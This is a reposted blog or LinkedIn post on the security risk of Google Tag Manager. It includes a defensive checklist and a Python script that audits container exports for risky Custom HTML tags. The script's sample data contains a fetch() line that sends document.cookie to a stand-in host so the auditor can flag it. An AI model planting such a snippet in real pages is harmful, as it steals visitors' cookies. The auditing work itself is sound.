Are you handling GTM securely?

Dear Data-Traveller, please note that this is a LinkedIn remix.

I posted this content already on LinkedIn in February 2022, but I want to make sure it doesn't get lost in the social network abyss.

For accessibility and also as our own content backup, we repost the original text here.

Have a look, leave a like if you like it, and join the conversation in the comments if this sparks a thought!

Original Post:

Plain Text:

For CTOs and developers: Google Tag Manager is an open script library where everyone with access can inject any piece of JS code into your website without you noticing it.

Think of Google Tag Manager as that one machine that has been running for ages, seems to send and receive data, and nobody really knows what it does. But you are afraid to just turn it off.

I have worked with organizations which had the highest standards when it comes to information technology.

When you wanted to use new third-party software, there was an intense process with a huge checklist, testing for example whether this software could be a risk for exposing customer data.

Same with in-house developed software. There were processes in place so that you did not use any random library from the web, only ones from a vetted, self-hosted registry.

High and efficient security. And of course everyone was annoyed by the fact that you could not easily try out the 20th task management tool next week.

The same kind of company also allowed using a tag management system. And since no one had really looked into how the solution actually works, they created a gateway to security hell's dimension without knowing it. The keys were handed gracefully to the marketing team, who handed them over to their agencies (must be 4-5 at the moment).

And the agencies used this gateway to add script after script, each happy to receive any customer and transaction data, to make sure that this data is equally shared with the ad industry.

I can recommend having a fun afternoon with the wonderful tool by Dr. Augustine Fou, ad fraud researcher (link in the comments), and checking your favourite websites.

This is an especially fun task for us EU people: see which ad networks are classified as business-essential, so that data is sent to them before any consent.

Just repeating, for CTOs and developers: GTM is a script library where everyone with access can inject any piece of JS code into your website. This can be harmless, but every script can pass on a request to thousands of other servers.

I recommend:

  • check every deployment in GTM with a dev counterpart
  • check the JS code (when a plain HTML tag is added)
  • check the template author (when a template is used); use only verified templates, ideally from the vendor itself
  • check the requests the tag sends
  • check the request chain by using a tool like FouAnalytics

If this gives you enough of a headache, go for server-side tag management; it limits the exposure significantly.
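As an added example (not from the original post), here is a small Python audit that applies the checklist above to a GTM container export: it lists every Custom HTML tag with the external hosts its code references and flags tags built from custom templates whose author still has to be verified. It assumes the container export JSON layout (containerVersion.tag[], type "html", parameter key "html") and runs on a constructed sample container.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample of a GTM container export (Admin > Export Container).
# Assumed layout: containerVersion.tag[] with type "html" for Custom HTML tags,
# the code in a parameter keyed "html", and custom templates typed "cvt_*".
SAMPLE_EXPORT = json.dumps({
    "exportFormatVersion": 2,
    "containerVersion": {
        "tag": [
            {"tagId": "1", "name": "GA4 Config", "type": "gaawc",
             "parameter": [{"key": "measurementId", "value": "G-PLACEHOLDER"}]},
            {"tagId": "7", "name": "Agency pixel", "type": "html",
             "parameter": [{"key": "html", "value":
                 "<script src='https://pixel.example-adnet.test/p.js'></script>"
                 "<script>fetch('https://sync.example-partner.test/s?c='"
                 "+encodeURIComponent(document.cookie))</script>"}]},
            {"tagId": "9", "name": "Vendor gallery template", "type": "cvt_123_45",
             "parameter": []},
        ]
    },
})

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def audit_container(export_json: str) -> dict:
    """Build the review worklist for the dev counterpart: each Custom HTML tag
    with the hosts it talks to (plus a heuristic flag for cookie access), and
    each custom-template tag whose author must be checked in the gallery."""
    tags = json.loads(export_json)["containerVersion"].get("tag", [])
    html_tags, template_tags = [], []
    for tag in tags:
        if tag["type"] == "html":
            code = next((p["value"] for p in tag.get("parameter", [])
                         if p.get("key") == "html"), "")
            hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(code)})
            html_tags.append({"tagId": tag["tagId"], "name": tag["name"],
                              "hosts": hosts,
                              "reads_cookie": "document.cookie" in code})
        elif tag["type"].startswith("cvt_"):
            template_tags.append({"tagId": tag["tagId"], "name": tag["name"],
                                  "type": tag["type"]})
    return {"custom_html": html_tags, "custom_templates": template_tags}


if __name__ == "__main__":
    print(json.dumps(audit_container(SAMPLE_EXPORT), indent=2))
```

The host list is the starting point for the "check the requests" step; what those hosts call in turn still needs a request-chain tool in the browser.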